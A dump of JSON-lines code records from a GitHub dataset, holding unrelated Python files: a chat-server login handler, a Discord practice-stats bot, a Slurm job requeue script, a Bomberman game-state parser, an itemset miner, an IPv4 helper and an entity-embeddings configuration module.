print(rsa_pwd)\n if user_pwd == res_pwd:\n # 不能用rsa来get_token,先解码\n token = get_token(int(data[\"content\"][\"user_id\"]), res_pwd)\n print(type(token))\n back_data = {\n \"type\": \"user_login\",\n 'back_data': \"0003\",\n 'content': {\n 'user_id': int(data['content']['user_id']),\n 'user_name': res[0][1],\n 'token': token\n }\n }\n result = \"用户名密码登录成功\"\n # 登录成功,维护在线用户表\n online_clients[int(data[\"content\"][\"user_id\"])] = (socket, address)\n # retrieve_messages(content['user_id'])\n else:\n back_data = {\n \"type\": \"user_login\",\n 'back_data': \"0004\",\n 'content': {\n 'user_id': int(data['content']['user_id'])\n }\n }\n result = \"密码大概是错了\"\n back_json_data = json.dumps(back_data).encode('utf-8')\n socket.sendall(back_json_data)\n return result\n","repo_name":"TT2TER/Echoplex","sub_path":"server/user_login.py","file_name":"user_login.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4084107191","text":"import sys\nimport typing\nimport logging\nimport importlib\n\nimport discord\nfrom discord.ext import commands\n\nfrom Framework import mongo_utils, time_utils\n\nvar_config = importlib.__import__(\"Config.var_config_\" + sys.argv[1], fromlist=(\"var_config_\" + sys.argv[1]))\n\n\nclass Stats(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n @commands.command(aliases=['stats', 'stat'])\n async def _get_user_stats(self, ctx, *, args: typing.Optional[discord.Member] = None):\n await get_user_stats(ctx, args)\n\n @commands.command(aliases=['serverstats', 'svst'])\n @commands.has_permissions(manage_roles=True)\n async def _get_server_stats(self, ctx, type: typing.Optional[str] = None):\n await get_server_stats(ctx, type)\n\n @commands.command(aliases=['leaderboard', 'leader'])\n @commands.has_permissions(manage_roles=True)\n async def _get_leaderboard(self, ctx):\n await get_leaderboard(ctx)\n\n\nasync def get_user_stats(ctx: discord.ext.commands.Context, user: discord.Member):\n # if a mentioned user was not provided, fetches the stats of the author of the command\n if user is None:\n user = ctx.author\n\n # get the user's document from mongo database\n stats = mongo_utils.find_user_record(str(user.id), str(ctx.guild.id))\n\n # if there user has not practiced before their document will not exist in the database\n if stats is None:\n await ctx.reply(f'User {user.name}#{user.discriminator}\\'s record does not exist')\n return\n\n # retrieve their stats and return it in embed form\n 
last_rep = stats['info']['practiceStats']['lastRep']\n    total_readable = time_utils.time_readable(stats['info']['practiceStats']['totalTime'])\n    last_readable = time_utils.time_readable(stats['info']['practiceStats']['lastRepTime'])\n\n    embed = discord.Embed()\n    embed.colour = 16357382\n    embed.timestamp = time_utils.now_date()\n    embed.set_author(name=f'{user.name}#{user.discriminator}', icon_url=user.avatar_url)\n    embed.set_thumbnail(url=user.avatar_url)\n\n    embed.add_field(name='Last Repertoire', value=last_rep, inline=False)\n    embed.add_field(name='Last Repertoire Practice Time', value=f'You practiced your last rep for: {last_readable[1]}h {last_readable[2]}m {last_readable[3]}s', inline=False)\n    embed.add_field(name='Total Practice Time', value=f'Total Time Practiced: {total_readable[1]}h {total_readable[2]}m {total_readable[3]}s', inline=False)\n\n    await(await ctx.reply(embed=embed)).delete(delay=20)\n    return\n\n\nasync def get_server_stats(ctx: discord.ext.commands.Context, stat_type):\n    # gets the server's stats from mongo\n    stats = mongo_utils.find_server_record(str(ctx.guild.id))\n\n    # if there is no server record (if no practice times have been recorded from any user in that server)\n    if stats is None:\n        await ctx.reply(f'This server\\'s record does not exist')\n        return\n\n    # return the stats for the server in embed form\n    daily = time_utils.time_readable(stats['practiceStats']['dailyTotal'])\n    weekly = time_utils.time_readable(stats['practiceStats']['weeklyTotal'])\n    monthly = time_utils.time_readable(stats['practiceStats']['monthlyTotal'])\n    yearly = time_utils.time_readable(stats['practiceStats']['yearlyTotal'])\n    grand_total = time_utils.time_readable(stats['practiceStats']['grandTotal'])\n\n    embed = discord.Embed()\n    embed.colour = 16357382\n    embed.timestamp = time_utils.now_date()\n    embed.set_thumbnail(url='https://cdn.discordapp.com/attachments/693257204819689483/822353418839916544/IMG_1553.jpg')\n\n    if stat_type == 'daily':\n        embed.title = 'Daily Server Practice Time'\n        embed.add_field(name='Daily Total', value=f'{daily[1]}h {daily[2]}m {daily[3]}s', inline=False)\n    elif stat_type == 'weekly':\n        embed.title = 'Weekly Server Practice Time'\n        embed.add_field(name='Weekly Total', value=f'{weekly[0]}d {weekly[1]}h {weekly[2]}m {weekly[3]}s', inline=False)\n    elif stat_type == 'monthly':\n        embed.title = 'Monthly Server Practice Time'\n        embed.add_field(name='Monthly Total', value=f'{monthly[0]}d {monthly[1]}h {monthly[2]}m {monthly[3]}s', inline=False)\n    elif stat_type == 'yearly':\n        embed.title = 'Yearly Practice Time'\n        embed.add_field(name='Yearly Total', value=f'{yearly[0]}d {yearly[1]}h {yearly[2]}m {yearly[3]}s', inline=False)\n    elif stat_type == 'grand':\n        embed.title = 'Grand Total Practice Time'\n        embed.add_field(name='Grand Total', value=f'{grand_total[0]}d {grand_total[1]}h {grand_total[2]}m {grand_total[3]}s', inline=False)\n    elif stat_type == 'all' or stat_type is None:\n        embed.title = 'Server Practice Time Totals'\n        embed.add_field(name='Daily Total', value=f'{daily[1]}h {daily[2]}m {daily[3]}s', inline=False)\n        embed.add_field(name='Weekly Total', value=f'{weekly[0]}d {weekly[1]}h {weekly[2]}m {weekly[3]}s', inline=False)\n        embed.add_field(name='Monthly Total', value=f'{monthly[0]}d {monthly[1]}h {monthly[2]}m {monthly[3]}s', inline=False)\n        embed.add_field(name='Yearly Total', value=f'{yearly[0]}d {yearly[1]}h {yearly[2]}m {yearly[3]}s', inline=False)\n        embed.add_field(name='Grand Total', value=f'{grand_total[0]}d {grand_total[1]}h {grand_total[2]}m {grand_total[3]}s', 
inline=False)\n\n await(await ctx.reply(embed=embed)).delete(delay=20)\n return\n\n\nasync def get_leaderboard(ctx: discord.ext.commands.Context):\n # get the server's practice leaderboard\n stat_list = mongo_utils.get_user_leaderboard(str(ctx.guild.id))\n\n # if there is no leaderboard (if no practice times have been recorded from any user in that server) or something else went wrong with the retrieval\n if stat_list is None:\n await ctx.reply(f'Could not retrieve this server\\'s leaderboard')\n return\n\n # create an embed for the leaderboard\n embed = discord.Embed()\n embed.colour = 16357382\n embed.title = 'Practice Time Leaderboard'\n embed.timestamp = time_utils.now_date()\n embed.set_thumbnail(url='https://cdn.discordapp.com/attachments/693257204819689483/822353418839916544/IMG_1553.jpg')\n\n # this will be to index the top users in each server\n # automatic indexing won't work here because if there is a null user (user document is no longer in the server)\n # leaderboard will error out and not display the embed\n index = 0\n # for each statistic on the leaderboard\n for stats in stat_list:\n # gets the user associated with the current statistic\n user = ctx.guild.get_member(int(stats[\"userId\"]))\n\n # this handles the case where user is no longer in the server\n if user is None:\n # just move on to the next user without incrementing the index\n continue\n\n # dev note: we should probably delete records of users no longer in the server after some time\n\n total_readable = time_utils.time_readable(stats['info']['practiceStats']['totalTime'])\n total_str = f'{total_readable[0]}d {total_readable[1]}h {total_readable[2]}m {total_readable[3]}s'\n\n # if current user is the holder for most practiced in the server (excluding anyone no longer in the server)\n # give them a crown beside their name\n if index == 0:\n embed.add_field(name=f'{index+1}. {user.name}#{user.discriminator} ♕', value=f'Total time practiced: ' + total_str, inline=False)\n else:\n embed.add_field(name=f'{index+1}. 
{user.name}#{user.discriminator}', value=f'Total time practiced: ' + total_str, inline=False)\n\n # we increment the index here so when above user null case gets hit, index does not get incremented\n index += 1\n\n logging.log(level=logging.INFO, msg=f'Leaderboard requested by {ctx.author.name}#{ctx.author.discriminator}')\n\n await(await ctx.reply(embed=embed)).delete(delay=20)\n return\n\n\ndef setup(client):\n client.add_cog(Stats(client))\n","repo_name":"PradyRao/Shush","sub_path":"Commands/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":7907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12301209847","text":"class intro : \n def __init__(self, name, age, sex):\n self.name=name\n self.age=age\n self.sex=sex\n \n def __str__(self) :\n return \"{}는 {}세이고, {}입니다.\".format(self.name, self.age, self.sex)\n\njj = intro(\"짱구\",5,\"남자\")\ndd = intro(\"도라에몽\",14,\"남자\")\ncc = intro(\"코난\",8,\"남자\")\nss = intro(\"쇼콜라\",15,\"여자\")\naa = intro(\"아무\",12,\"여자\")\ngg = intro(\"가영\",16,\"여자\")\nprint(jj)\nprint(dd)\nprint(cc)\nprint(ss)\nprint(aa)\nprint(gg)","repo_name":"ji3847/python","sub_path":"파이썬과제3_이지현.py","file_name":"파이썬과제3_이지현.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18789538184","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_log import log\nfrom oslo_utils import excutils\n\nfrom dragonflow.tests.common import app_testing_objects\nfrom dragonflow.tests.common import utils as test_utils\nfrom dragonflow.tests.fullstack import test_base\n\nLOG = log.getLogger(__name__)\n\n\nclass TestApps(test_base.DFTestBase):\n def test_infrastructure(self):\n try:\n topology = app_testing_objects.Topology(self.neutron, self.nb_api)\n subnet1 = topology.create_subnet(cidr='192.168.10.0/24')\n subnet2 = topology.create_subnet(cidr='192.168.11.0/24')\n port1 = subnet1.create_port()\n port2 = subnet2.create_port()\n topology.create_router([subnet1.subnet_id, subnet2.subnet_id])\n LOG.info('Port1 name: {}'.format(port1.tap.tap.name))\n LOG.info('Port2 name: {}'.format(port2.tap.tap.name))\n test_utils.print_command(['ip', 'addr'])\n test_utils.print_command(['ovs-vsctl', 'show'], True)\n test_utils.print_command(\n ['ovs-ofctl', 'show', self.integration_bridge],\n True\n )\n test_utils.print_command(\n ['ovs-ofctl', 'dump-flows', self.integration_bridge],\n True\n )\n test_utils.print_command(\n ['ovsdb-client', 'dump', 'Open_vSwitch'],\n True\n )\n except Exception:\n with excutils.save_and_reraise_exception():\n try:\n topology.close()\n except Exception:\n pass # Ignore\n topology.close()\n","repo_name":"openstack-archive/dragonflow","sub_path":"dragonflow/tests/fullstack/test_apps.py","file_name":"test_apps.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"48"} +{"seq_id":"69916517905","text":"import os\nimport time\n\nsbatch_f = \"/scratch/bingo/joao.barretos/hide_and_seek/sbatches/simple_test/sbatch_simple_test.srm\"\nn_simple_teste = \"/scratch/bingo/joao.barretos/hide_and_seek/sbatches/simple_test/simple_test{}.srm\"\nsqueue = \"squeue -u joao.barretos -p cpu_dev\"\nsleep_time = 5\nn_testes = 2\nmax_queue = 1\n\nfor n_teste in range(n_testes): \n os.system(\"cp {} {}\".format(sbatch_f, n_simple_teste.format(n_teste)))\n \nfor n_teste in range(n_testes):\n in_queue = len(os.popen(squeue).read().split(\"\\n\"))-2\n print(\"{} jobs in queue\".format(in_queue))\n while in_queue>=max_queue:\n print(\"Waiting for space in queue...\")\n time.sleep(sleep_time)\n in_queue = len(os.popen(squeue).read().split(\"\\n\"))-2\n print(\"Executing sbatch {}\".format(n_teste))\n os.system(\"sbatch {}\".format(n_simple_teste.format(n_teste)))\n","repo_name":"joaoalbert/sbatches","sub_path":"simple_test/simple_requeue.py","file_name":"simple_requeue.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23014215395","text":"from game_utils import *\n\nowner_unit_id = \"unit_id\"\n\nendgame_fire_start_danger = 3.0\nendgame_fire_end_danger = 0.0 # danger of the endgame fire in the center\nendgame_fire_base_multiplier = 0.1\nendgame_fire_else = 40\nendgame_fire_endgame_multiplier_per_fire = 0.02\nendgame_fire_center_discount_mass = -0.2\nendgame_fire_center_discount = -0.2 # gets multiplied by HP.\n\nmy_bomb_starting_danger = 5\nenemy_bomb_starting_danger = 140\nbomb_end_danger_ticks = 5\nunarmed_bomb_danger_modifier = 0.9\nbomb_end_danger_max = 150\n\nclose_cell_danger = 0.1\n\nbomb_arming_ticks = 5\npower_up_discount = -0.5\nclose_enemy_discount = -0.2\nclose_to_center_enemy_discount = -3\ncenter_occupied_ammo_discount = -3\nexplosion_danger 
= 100000\nstand_on_bomb_danger = 999\n\nsearch_budget_big = 50\nsearch_budget_small = 25\nsearch_horizon = 30\n\n\nclass Parser:\n\n def __init__(self, tick_number, game_state,\n calculate_wall_map=False, pov_agent_id=None):\n w = game_state.get(\"world\").get(\"width\")\n h = game_state.get(\"world\").get(\"height\")\n self.w = w\n self.h = h\n self.center = Point(w // 2, h // 2)\n self.walkable_map = np.zeros((w, h))\n self.cell_occupation_danger_map = np.zeros((w, h))\n self.my_bomb_explosion_map_objects = [[None for i in range(h)] for j in range(w)]\n self.all_bomb_explosion_map = np.zeros((w, h), dtype=object)\n self.danger_map = np.zeros((w, h))\n self.power_ups = []\n self.bombs = []\n self.my_bombs = []\n self.my_armed_bombs = []\n self.enemy_bombs = []\n self.endgame_fires = 0\n self.my_units = []\n self.my_unit_ids = []\n self.enemy_units = []\n self.enemy_unit_ids = []\n self.unit_id_to_unit = dict()\n self.cluster_to_bombs = dict()\n\n if calculate_wall_map:\n self.wall_map = np.zeros_like(self.walkable_map)\n\n # ====== process units =====\n\n units = game_state.get(\"unit_state\")\n self.units = units\n\n if pov_agent_id is None:\n my_agent_id = game_state.get(\"connection\").get(\"agent_id\")\n else:\n my_agent_id = pov_agent_id\n my_units = game_state.get(\"agents\").get(my_agent_id).get(\"unit_ids\")\n for unit_id in my_units:\n self.parse_unit(unit_id, self.my_units, self.my_unit_ids)\n for agent_id in game_state.get(\"agents\"):\n if agent_id == my_agent_id:\n continue\n enemy_units = game_state.get(\"agents\").get(agent_id).get(\"unit_ids\")\n for unit_id in enemy_units:\n self.parse_unit(unit_id, self.enemy_units, self.enemy_unit_ids)\n for unit in self.enemy_units:\n self.walkable_map[unit.pos] = math.inf\n self.my_units.sort(key=lambda u: u.hp, reverse=True)\n # ====== process entities =====\n\n entities = game_state.get(\"entities\")\n self.entities = entities\n\n # a: ammunition\n # b: Bomb\n # x: Blast\n # bp: Blast Powerup\n # m: Metal Block\n # o: Ore Block\n # w: Wooden Block\n for entity in entities:\n e_type = entity.get(\"type\")\n if e_type == \"a\" or e_type == \"bp\":\n self.power_ups.append(entity)\n continue\n coordinates = entity.get(\"x\"), entity.get(\"y\")\n if e_type != \"x\":\n self.walkable_map[coordinates] = math.inf\n draw_cross(self.cell_occupation_danger_map, coordinates[0], coordinates[1], rad=2,\n value=close_cell_danger)\n if e_type == \"b\":\n bomb_placed_tick = entity.get(\"created\")\n bomb_will_explode_tick = entity.get(\"expires\")\n is_armed = tick_number - bomb_placed_tick > bomb_arming_ticks\n\n bomb = Bomb(\n Point(*coordinates),\n entity.get(\"blast_diameter\"),\n entity.get(owner_unit_id),\n is_armed\n )\n self.bombs.append(bomb)\n\n is_my_bomb = bomb.owner_unit_id in my_units\n\n base_danger = my_bomb_starting_danger if is_my_bomb else enemy_bomb_starting_danger\n\n if not is_armed:\n base_danger *= unarmed_bomb_danger_modifier\n\n end_danger = 0\n if tick_number >= bomb_will_explode_tick - bomb_end_danger_ticks:\n end_danger = bomb_end_danger_max * (1 - (bomb_will_explode_tick - tick_number - 1) /\n bomb_end_danger_ticks)\n bomb_danger = base_danger + end_danger\n\n cluster = BombCluster(\n bomb.pos,\n bomb_danger,\n is_armed,\n is_my=is_my_bomb,\n is_enemy=not is_my_bomb,\n ticks_till_explode=bomb_will_explode_tick - tick_number,\n my_bomb_that_can_trigger=bomb if is_my_bomb and is_armed else None\n )\n map_entry = BombExplosionMapEntry(bomb, cluster)\n self.all_bomb_explosion_map[bomb.pos] = map_entry\n 
self.cluster_to_bombs[cluster] = [map_entry]\n\n if is_my_bomb:\n self.my_bombs.append(bomb)\n if is_armed:\n self.my_armed_bombs.append(bomb)\n else:\n self.enemy_bombs.append(bomb)\n if e_type == \"x\":\n if \"expires\" not in entity:\n self.endgame_fires += 1\n self.danger_map[coordinates] = explosion_danger\n if calculate_wall_map:\n if e_type == \"m\":\n self.wall_map[coordinates] = math.inf\n if e_type == \"w\" or e_type == \"o\":\n self.wall_map[coordinates] = entity.get(\"hp\")\n self.process_bombs()\n for x, y in np.ndindex(self.all_bomb_explosion_map.shape):\n map_entry = self.all_bomb_explosion_map[x, y]\n if map_entry:\n self.danger_map[x, y] += map_entry.cluster.danger\n\n def process_bombs(self):\n arr = self.all_bomb_explosion_map\n for bomb in self.bombs:\n x, y = bomb.pos\n rad = blast_r(bomb.blast_diameter)\n entry = self.all_bomb_explosion_map[bomb.pos]\n for i in range(1, rad):\n if x + i < arr.shape[0]:\n other = arr[x + i, y]\n if other:\n self.merge(entry, other)\n break\n arr[x + i, y] = entry\n for i in range(1, rad):\n if x - i >= 0:\n other = arr[x - i, y]\n if other:\n self.merge(entry, other)\n break\n arr[x - i, y] = entry\n for i in range(1, rad):\n if y + i < arr.shape[1]:\n other = arr[x, y + i]\n if other:\n self.merge(entry, other)\n break\n arr[x, y + i] = entry\n for i in range(1, rad):\n if y - i >= 0:\n other = arr[x, y - i]\n if other:\n self.merge(entry, other)\n break\n arr[x, y - i] = entry\n\n def merge(self, bomb_map_entry: BombExplosionMapEntry, other: BombExplosionMapEntry):\n other_cluster = other.cluster\n my_cluster = bomb_map_entry.cluster\n new_cluster = bomb_map_entry.cluster.merge_with(other.cluster)\n new_cluster_entries = []\n for other_cluster_entry in self.cluster_to_bombs[other_cluster]:\n other_cluster_entry.cluster = new_cluster\n new_cluster_entries.append(other_cluster_entry)\n for cluster_entry in self.cluster_to_bombs[my_cluster]:\n cluster_entry.cluster = new_cluster\n new_cluster_entries.append(cluster_entry)\n self.cluster_to_bombs[other_cluster].clear()\n self.cluster_to_bombs[my_cluster].clear()\n self.cluster_to_bombs[new_cluster] = new_cluster_entries\n\n def parse_unit(self, unit_id, target_list, target_ids_list):\n unit = self.units.get(unit_id)\n pos = point(unit)\n if unit.get(\"hp\") <= 0:\n self.walkable_map[pos.x, pos.y] = math.inf\n draw_cross(self.cell_occupation_danger_map, pos.x, pos.y, rad=2, value=close_cell_danger)\n else:\n target_ids_list.append(unit_id)\n res = Unit(\n unit_id,\n pos,\n unit.get(\"inventory\").get(\"bombs\"),\n unit.get(\"hp\"),\n unit.get(\"blast_diameter\"),\n unit.get(\"invulnerability\")\n )\n target_list.append(res)\n self.unit_id_to_unit[unit_id] = res\n\n def check_free(self, p, rad) -> bool:\n \"\"\"\n :return: True if cross has at least one direction free\n \"\"\"\n x, y = p\n arr = self.cell_occupation_danger_map\n free = True\n for i in range(rad):\n if x + i < arr.shape[0] and arr[x + i, y] >= close_cell_danger * 3:\n free = False\n break\n if free:\n return True\n free = True\n for i in range(rad):\n if x - i >= 0 and arr[x - i, y] >= close_cell_danger * 3:\n free = False\n break\n if free:\n return True\n free = True\n for i in range(rad):\n if y + i < arr.shape[1] and arr[x, y + i] >= close_cell_danger * 3:\n free = False\n break\n if free:\n return True\n for i in range(rad):\n if y - i >= 0 and arr[x, y - i] >= close_cell_danger * 3:\n return False\n\n\ndef draw_bomb_explosion_with_obj(arr, obj_arr, bomb, value=1.):\n x, y = bomb.pos\n arr[x, y] = 1\n obj_arr[x][y] = 
bomb\n    for i in range(blast_r(bomb.blast_diameter)):\n        if x + i < arr.shape[0]:\n            arr[x + i, y] += value\n            obj_arr[x + i][y] = bomb\n        if x - i >= 0:\n            arr[x - i, y] += value\n            obj_arr[x - i][y] = bomb\n        if y + i < arr.shape[1]:\n            arr[x, y + i] += value\n            obj_arr[x][y + i] = bomb\n        if y - i >= 0:\n            arr[x, y - i] += value\n            obj_arr[x][y - i] = bomb\n\n\ndef draw_bomb_explosion(arr, bomb, rad=None, value=1.):\n    x, y = bomb.get(\"x\"), bomb.get(\"y\")\n    if rad is None:\n        rad = blast_r(bomb.get(\"blast_diameter\"))\n    draw_cross(arr, x, y, rad, value)\n\n\ndef draw_cross(arr, x, y, rad, value):\n    for i in range(rad):\n        if x + i < arr.shape[0]:\n            arr[x + i, y] += value\n        if x - i >= 0:\n            arr[x - i, y] += value\n        if y + i < arr.shape[1]:\n            arr[x, y + i] += value\n        if y - i >= 0:\n            arr[x, y - i] += value\n\n\ndef draw_cross_assign(arr, x, y, rad, value):\n    for i in range(rad):\n        if x + i < arr.shape[0]:\n            arr[x + i, y] = value\n        if x - i >= 0:\n            arr[x - i, y] = value\n        if y + i < arr.shape[1]:\n            arr[x, y + i] = value\n        if y - i >= 0:\n            arr[x, y - i] = value\n","repo_name":"ktolnos/Bomnerman-2022-agent","sub_path":"python3/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":11379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31922042865","text":"class IPv4:\n\tdef __init__(self,x,m):\n\t\tself.x=x\n\t\tself.m=m\n\tdef getNetwork(self):\n\t\t# derive the network address by keeping the octets covered by the mask and zeroing the host bits\n\t\tnetwork=[]\n\t\tbits=self.m\n\t\tfor octet in self.x:\n\t\t\tif bits>=8:\n\t\t\t\tnetwork.append(octet)\n\t\t\telif bits>0:\n\t\t\t\tnetwork.append(octet&(0xFF<<(8-bits))&0xFF)\n\t\t\telse:\n\t\t\t\tnetwork.append(0)\n\t\t\tbits-=8\n\t\treturn network\n\nipv4=IPv4([10,0,1,7],24)\nnet=ipv4.getNetwork()\nprint(net)\n","repo_name":"gyanshah/classes","sub_path":"Lab7/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6897890156","text":"# Functions\ndef yes_no(question_text):\n    while True:\n\n        # Ask user if they know the Maori days of the week\n        answer = input(question_text).lower()\n\n        # If yes print \"This program is useless to you\"\n        if answer == \"Y\" or answer == \"y\":\n            answer = \"Yes\"\n            return answer\n\n        # If no print \"This program will help you learn Maori\"\n        if answer == \"N\" or answer == \"n\":\n            answer = \"No\"\n            return answer\n\n        # Otherwise - show error\n        else:\n            print(\"Answer with Y or N\")\n\n\n# main route\nFluency_Checker = yes_no(\"Do you know the Maori names for days of the week? 
\")\nif Fluency_Checker == \"Yes\":\n print(\"This program will help you learn the Maori days of the week\")\n\nif Fluency_Checker == \"No\":\n print(\"This program wouldn't help you\")\n","repo_name":"Aidan7474/T2_Assesment","sub_path":"Fluency_Checker V3.py","file_name":"Fluency_Checker V3.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1449157968","text":"import math\nfrom itertools import combinations\n\ndef read_dataset(filename):\n\tlines = open(filename).readlines()\n\titems = lines[0].split(',')\n\tdata = []\n\tfor line in lines[1:]:\n\t\tdata.append(list(map(int, line.split(','))))\n\treturn { 'items': items, 'data': data }\n\ndef get_freq(data, items, combination):\n\tfreq = 0\n\tfor row in data:\n\t\ttemp = 1\n\t\tfor i in combination:\n\t\t\ttemp *= row[items.index(i)]\n\t\tif temp >= 1:\n\t\t\tfreq += 1\n\treturn freq\n\ndef get_itemsets(data, items, level):\n\tsets = set(combinations(items, level))\n\titem_sets = []\n\tfor s in sets:\n\t\tif(get_freq(data, items, s) >= min_freq):\n\t\t\titem_sets.append(s)\n\treturn item_sets\n\ndataset = read_dataset('market.csv')\nmin_support = 40\nmin_freq = math.ceil((min_support/100.0)*len(dataset['data']))\n\nfor l in range(2, len(dataset['items']) + 1):\n\titemset = get_itemsets(dataset['data'], dataset['items'], l)\n\tif(len(itemset) == 0):\n\t\tbreak\n\tprint(\"Level: \" + str(l) + \": \\n\" + str(itemset) + \"\\n\\n\")","repo_name":"virajvchavan/Data-Mining","sub_path":"frequent_item_set/method2/frequent_itemsets.py","file_name":"frequent_itemsets.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43970493685","text":"\"\"\"\nThis file contains both the Category and EmbeddingConfig classes, which are responsible to store data related to the\ncategories. 
This data will be later on used on our EmbeddingNetwork class.\n\"\"\"\nfrom typing import List\n\nimport numpy as np\n\nfrom entity_embeddings.network.assembler import get_model_assembler\nfrom entity_embeddings.processor.target_type import TargetType\nfrom entity_embeddings.util.dataframe_utils import load_guarantee_not_empty\nfrom entity_embeddings.util.processor_utils import get_target_processor\nfrom entity_embeddings.util.validation_utils import *\n\n\ndef get_embedding_size(unique_values: int) -> int:\n \"\"\"\n Return the embedding size to be used on the Embedding layer\n :param unique_values: the number of unique values in the given category\n :return: the size to be used on the embedding layer\n \"\"\"\n size = int(min(np.ceil(unique_values / 2), 50))\n if size < 2:\n return 2\n else:\n return size\n\n\ndef generate_categories_from_df(df: pd.DataFrame, target_name: str) -> List:\n \"\"\"\n Returns a list of the categories from a given pandas DataFrame, with the exception of the provided target name\n :param df: the DataFrame\n :param target_name: the name of the target column to not be included\n :return: a List of Category with the df columns except the provided one\n \"\"\"\n category_list = []\n\n for category in df:\n if not category == target_name:\n category_list.append(Category(category, df[category].nunique()))\n\n return category_list\n\n\nclass Category:\n \"\"\"\n Used to store fields related to a given category, such as its name, count of unique values and the size of each\n embedding layer\n \"\"\"\n\n def __init__(self, alias: str, unique_values: int):\n self.alias = alias\n self.unique_values = unique_values\n self.embedding_size = get_embedding_size(unique_values)\n\n\nclass Config:\n \"\"\"\n Used to store all the configuration (dataframes, target type, epochs, artifacts..) 
which will be\n used on our Embeddings Network\n \"\"\"\n\n def __init__(self,\n csv_path: str,\n target_name: str,\n train_ratio: float,\n target_processor: TargetProcessor,\n model_assembler: ModelAssembler,\n epochs: int = 10,\n batch_size: int = 128,\n verbose: bool = False,\n artifacts_path: str = 'artifacts'):\n # input validations\n check_csv_data(csv_path)\n check_target_name(target_name)\n check_train_ratio(train_ratio)\n check_epochs(epochs)\n check_batch_size(batch_size)\n\n check_target_processor(target_processor)\n check_model_assembler(model_assembler)\n\n self.csv_path = csv_path\n self.target_name = target_name\n self.train_ratio = train_ratio\n self.epochs = epochs\n self.batch_size = batch_size\n self.verbose = verbose\n self.artifacts_path = artifacts_path\n\n self.target_processor = target_processor\n self.model_assembler = model_assembler\n\n self.df = load_guarantee_not_empty(self.csv_path)\n check_target_existent_in_df(self.target_name, self.df)\n\n self.unique_classes = self.df[self.target_name].nunique()\n\n self.categories: List[Category] = generate_categories_from_df(self.df, self.target_name)\n\n # artifacts related fields\n self.DEFAULT_WEIGHTS_FILENAME = 'weights.pickle'\n self.DEFAULT_LABELS_FILENAME = 'labels.pickle'\n self.DEFAULT_PATH_VISUALIZATIONS = 'visualizations'\n\n @classmethod\n def make_default_config(cls,\n csv_path: str,\n target_name: str,\n target_type: TargetType,\n train_ratio: float,\n epochs: int = 10,\n batch_size: int = 128,\n verbose: bool = False,\n artifacts_path: str = 'artifacts'):\n \"\"\"\n Used to create a default Config object.\n\n :param csv_path: where the csv containing both the features and target is located\n :param target_name: the name of the target/output variable\n :param target_type: the TargetType to be used (BINARY, REGRESSION, MULTICLASS)\n :param train_ratio: the proportion to be used for the training subset\n :param epochs: how many epochs should the model be trained\n :param batch_size: the size of the batch size\n :param verbose: if logs should be outputted or not\n :param artifacts_path: where the artifacts (weights, labels, visualizations) should be stored\n :return: a Config object\n \"\"\"\n df = load_guarantee_not_empty(csv_path)\n check_target_existent_in_df(target_name, df)\n n_unique_classes = df[target_name].nunique()\n\n target_processor = get_target_processor(target_type)\n model_assembler = get_model_assembler(target_type, n_unique_classes)\n\n return cls(csv_path,\n target_name,\n train_ratio,\n target_processor,\n model_assembler,\n epochs,\n batch_size,\n verbose,\n artifacts_path)\n\n @classmethod\n def make_custom_config(cls,\n csv_path: str,\n target_name: str,\n train_ratio: float,\n target_processor: TargetProcessor,\n model_assembler: ModelAssembler,\n epochs: int = 10,\n batch_size: int = 128,\n verbose: bool = False,\n artifacts_path: str = 'artifacts'):\n \"\"\"\n Used to create a custom Config object. 
Mostly should be used when you want to have a custom TargetProcessor\n and/or a custom ModelAssembler.\n\n :param csv_path: where the csv containing both the features and target is located\n :param target_name: the name of the target/output variable\n :param train_ratio: the proportion to be used for the training subset\n :param target_processor: the TargetProcessor to be used\n :param model_assembler: the ModelAssembler to be used\n :param epochs: how many epochs should the model be trained\n :param batch_size: the size of the batch size\n :param verbose: if logs should be outputted or not\n :param artifacts_path: where the artifacts (weights, labels, visualizations) should be stored\n :return: a Config object\n \"\"\"\n return cls(csv_path,\n target_name,\n train_ratio,\n target_processor,\n model_assembler,\n epochs,\n batch_size,\n verbose,\n artifacts_path)\n\n def get_weights_path(self):\n \"\"\"\n Used to return the path of the stored weights\n :return: the pah of the stored weights on disk\n \"\"\"\n return os.path.join(self.artifacts_path, self.DEFAULT_WEIGHTS_FILENAME)\n\n def get_labels_path(self):\n \"\"\"\n Used to return the path of the stored labels\n :return: the pah of the stored labels on disk\n \"\"\"\n return os.path.join(self.artifacts_path, self.DEFAULT_LABELS_FILENAME)\n\n def get_visualizations_dir(self):\n \"\"\"\n Used to return the path of the stored visualizations\n :return: the pah of the stored visualizations on disk\n \"\"\"\n return os.path.join(self.artifacts_path, 